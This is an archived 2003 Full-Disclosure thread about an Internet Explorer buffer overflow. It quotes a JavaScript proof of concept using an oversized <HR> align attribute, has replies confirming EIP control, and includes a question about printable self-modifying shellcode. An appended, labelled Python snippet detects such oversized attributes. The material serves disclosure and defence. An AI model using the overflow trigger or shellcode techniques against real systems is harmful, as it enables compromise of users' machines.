RE: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

From: Rick (rikul_at_bellsouth.net)
Date: 06/25/03

  • Next message: Joe Stewart: "[Full-Disclosure] Re: Windows Messenger Popup Spam - advisory amended"
    To: <full-disclosure@lists.netsys.com>
    Date: Wed, 25 Jun 2003 11:13:05 -0600
    
    

    I got as far as having it jmp to shellcode with byte range 0x20 to 0x7f.
    I suppose if you have enough space these should be sufficient to create
    self-modifying shellcode which does something important. Does anyone
    know good papers or resources for something like that?

    - Rick Patel

    -----Original Message-----
    From: full-disclosure-admin@lists.netsys.com
    [mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of SecurITeam
    BugTraq Monitoring
    Sent: Wednesday, June 25, 2003 5:05 AM
    To: KF; Digital Scream
    Cc: full-disclosure@lists.netsys.com
    Subject: [Full-Disclosure] Re: Internet Explorer >=5.0 : Buffer overflow

    Hi,

    I can confirm it under Windows 2000 with IE 5.50.4807.2300.

    Full control over the EIP, but the shellcode cannot contain (as it
    currently appears) non-alphanumeric characters, too bad I guess.

    Thanks
    Noam Rathaus
    CTO
    Beyond Security Ltd
    http://www.SecurITeam.com
    http://www.BeyondSecurity.com
    ----- Original Message -----
    From: "KF" <dotslash@snosoft.com>
    To: "Digital Scream" <digitalscream@real.xakep.ru>
    Sent: Monday, June 23, 2003 6:43 PM
    Subject: Re: Internet Explorer >=5.0 : Buffer overflow

    > I can confirm this on Windows XP Professional
    >
    > version 6.0.2800.1106.xpsp2-030422-1633
    >
    > 0x43534c41 referenced mem at 0x43534c41
    > -KF
    >
    >
    > Digital Scream wrote:
    >
    > ><script>
    > > wnd=open("about:blank","","");
    > > wnd.moveTo(screen.Width,screen.Height);
    > > WndDoc=wnd.document;
    > > WndDoc.open();
    > > WndDoc.clear();
    > > buffer="";
    > > for(i=1;i<=127;i++)buffer+="X";
    > > buffer+="DigitalScream";
    > > WndDoc.write("<HR align='"+buffer+"'>");
    > > WndDoc.execCommand("SelectAll");
    > > WndDoc.execCommand("Copy");
    > > wnd.close();
    > ></script>
    > >
    > >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
    > >
    > >
    > >
    >
    >
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

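Added example, not posted by anyone in this thread: a small defender-side Python check that flags HTML in which an <HR> tag's align attribute carries a value far longer than any legitimate keyword, which is the condition the quoted PoC depends on (127 filler bytes plus a 13-byte marker). The 16-character threshold, the regex and the two sample documents are assumptions constructed here, not values from the original posts.

```python
import re

# Constructed samples. The first mirrors the structure of the quoted PoC
# (127 filler bytes plus "DigitalScream" in the align attribute of an <HR>
# tag); the second is an ordinary page with a normal align keyword.
SAMPLE_SUSPECT = "<html><body><HR align='" + "X" * 127 + "DigitalScream" + "'></body></html>"
SAMPLE_BENIGN = '<html><body><hr align="center"><p>hello</p></body></html>'

# Assumed threshold: legitimate align values are short keywords
# (left, center, right), so anything longer than 16 characters is odd.
MAX_ALIGN_LEN = 16

# Matches <hr ... align=...> with double-quoted, single-quoted or bare values.
HR_ALIGN_RE = re.compile(
    r"<hr\b[^>]*?\balign\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def find_oversized_hr_align(html, max_len=MAX_ALIGN_LEN):
    """Return (offset, value_length, all_printable) for every <HR align=...>
    whose value exceeds max_len.

    all_printable records whether every character of the value lies in
    0x20..0x7f, the byte range the thread reports as usable in the overflow;
    a long, purely printable attribute value is the signature to look for.
    """
    findings = []
    for m in HR_ALIGN_RE.finditer(html):
        # Exactly one of the three alternation groups matched.
        value = next(g for g in m.groups() if g is not None)
        if len(value) > max_len:
            printable = all(0x20 <= ord(c) <= 0x7F for c in value)
            findings.append((m.start(), len(value), printable))
    return findings


if __name__ == "__main__":
    for name, doc in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        for offset, length, printable in find_oversized_hr_align(doc):
            print(f"{name}: <HR align> value of {length} chars at offset {offset}, "
                  f"all printable={printable}")
```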


